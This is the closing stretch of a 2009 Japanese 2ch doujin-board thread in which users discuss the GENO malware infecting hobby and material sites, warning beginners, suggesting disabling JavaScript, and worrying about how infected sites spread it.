危機感持ってない餓鬼とPCに詳しくない人とかはもう少し危機感持つべきだよな
伝え方が難しいんだろうけど
987geno:2009/05/17(日) 22:18:31 ID:ugI/Fqnf0
>>985
アクセス成功、略してサクセス


そう考えてあげなさい
988GENO:2009/05/17(日) 22:20:27 ID:yKmrVTN+0
なんか日本語おかしかった
989GENO:2009/05/17(日) 22:21:03 ID:A50YHmp70
>>985
>>987
OTZ
990geno:2009/05/17(日) 22:21:24 ID:QXDaY3Dm0
>>983
javaスクリプトの切り方とか今朝覚えた自分にはものすごく分かりやすいよ

論破どうのってより、無警戒な初心者に危機感持ってもらうにはgood

ただ、サクセスってなんなn(ry
991名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 22:22:03 ID:MmWu1w5h0
>>983
まるでゴッキーだな
992GENO:2009/05/17(日) 22:22:35 ID:xM7ka16XO
>976
サイト入るのにジャバスク必要みたいだから入れないし、連絡できない…


サイト持ちは素材サイトも注意、ってことで…
993GENO:2009/05/17(日) 22:24:00 ID:7bIAj8MN0
まず長文は読まれないという事に気付くべきだ。
994GENO1:2009/05/17(日) 22:25:26 ID:miEoYQ0V0
長文は嫌い
箇条書きしか読まない・・・
995GENO:2009/05/17(日) 22:25:40 ID:l5MsZZlCO
素材サイトどころか、全てのサイトが危ないんですよね?
996名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 22:26:45 ID:5sZH/fyG0
>>983を略すと
1匹のウィルス持ちがいる
     ↓
10匹にウィルスが移る
     ↓
10匹のウィルス持ちが各地でウィルスをばらまく

こんな感じかな
997GENO1:2009/05/17(日) 22:26:54 ID:miEoYQ0V0
>>995
うん
管理人が多種多様のサイトを運営してたら、感染は拡大する
998GENO:2009/05/17(日) 22:27:46 ID:IllEtUoo0
>992
履歴からでも無理な感じ?
999GENO:2009/05/17(日) 22:28:12 ID:28MNX8DRO
>>992
携帯からはアクセスできない?携帯なら感染しないはず
同人サイト以外なら大丈夫って勘違いしてる人もいるだろうし
そもそもなんも知らない閲覧者もいるだろうし心配だ
1000GENO:2009/05/17(日) 22:28:52 ID:uEd/QI2I0
>>998
トップページ以外もすべて感染してる可能性があるから、なるべく踏まない方がいいだろうなあ
飛び先チェックとかでソース見て、メアド拾って直接メールとかできればいいんだが
10011001
  | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|
  |    最 後 尾 。  |     このスレッドは1000を超えました。
  |________|
     ∧∧ ||
    (. ゚д゚)||             同人@2ch掲示板
      / づΦ           http://changi.2ch.net/doujin/